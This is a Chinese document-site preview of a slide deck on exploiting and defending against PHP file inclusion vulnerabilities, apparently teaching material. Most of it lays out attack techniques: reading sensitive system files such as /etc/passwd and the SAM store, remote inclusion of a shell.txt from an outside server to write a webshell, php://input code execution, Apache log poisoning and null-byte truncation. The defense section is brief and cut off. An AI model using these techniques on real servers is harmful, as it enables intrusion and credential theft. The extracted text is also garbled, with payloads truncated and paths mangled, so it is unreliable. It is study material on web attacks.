文件包含漏洞利用与防御_第1页
文件包含漏洞利用与防御_第2页
文件包含漏洞利用与防御_第3页
文件包含漏洞利用与防御_第4页
文件包含漏洞利用与防御_第5页
已阅读5页,还剩7页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、 一、文件包含漏洞利用读取敏感信息远程包含写Shell本地包含配合文件上传使用PHP封装协议截断包含Apache日志文件文件包含 二、读取敏感信息常用方法: 在http:/ 反之,就会得到一个类似于open_basedir restriction in effect的警告。 二、读取敏感信息常见的敏感信息文件路径: Windows系统: C:boot.ini/查看系统版本 C:windowsrepairsam/存储Windows系统初次安装密码 C:Program Filesmysqlmy.ini/Mysql配置 Linux系统: /etc/passwd /usr/local/app/apac

2、he2/conf/httpd.conf /apache配置文件 /etc/f /Mysql配置文件 三、本地包含配合文件上传漏洞利用条件: 很多网站通常会提供文件上传功能。如:上传头像、图片、文档等,虽然文件格式都有一定的限制,但是与文件包含漏洞配合使用仍可以拿Shell 图片与文档的代码如下: ?phpfputs(fopen(“shell.php”,”w”),”);? 四、远程包含写Shell 条件:allow_url_fopen= On 远程服务器中shell.txt文件内容: ?phpfputs(fopen(“shell.php”,”w”),”);? 执行:http:/targetip/

3、index.php?page=http:/remoteip/shell.txt 此时在index.php所在的目录下会生成一个shell.php文件,文件内容为php一句话木马: 五、使用PHP封装协议PHP带有很多内置URL风格的封装协议,如:php:/filter、php:/input 使用封装协议php:/filter读取PHP文件的源代码 使用封装协议php:/input进行代码执行 六、Apache日志文件 Apache运行后一般默认会生成两个日志文件,这两个文件是access.log(访问日志)和error.log(错误日志)。 Apache的访问日志文件记录了客户端的每次请求及服

4、务器相应的相关信息。 例如,当我们请求index.php页面时,Apache就会记录下我们的操作,并且写到访问日志文件access.log文件中。 六、Apache日志文件 access.log日志文件格式如下: 条件:当前账户具有日志文件的读权限 方法:利用截包工具在URL或者UA中加入恶意代码,然后使用文件包含漏洞去包含日志文件找到Apache的路径是关键 七、截断包含截断方法: %00(NULL) 利用操作系统对目录最大长度的限制代码样例: ?php if(isset($_GETpage) include $_GETpage.”.php”; else includemain.php; 如果此时存在一个图片木马,名为1.jpg,可以输入如下URL:http:/www.f_ 八、文件包含漏洞防御 严格判断包含中的参数是否外部可控 路径限制:限制被包含的文件只能是某一个文件夹内,一定要禁止目

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论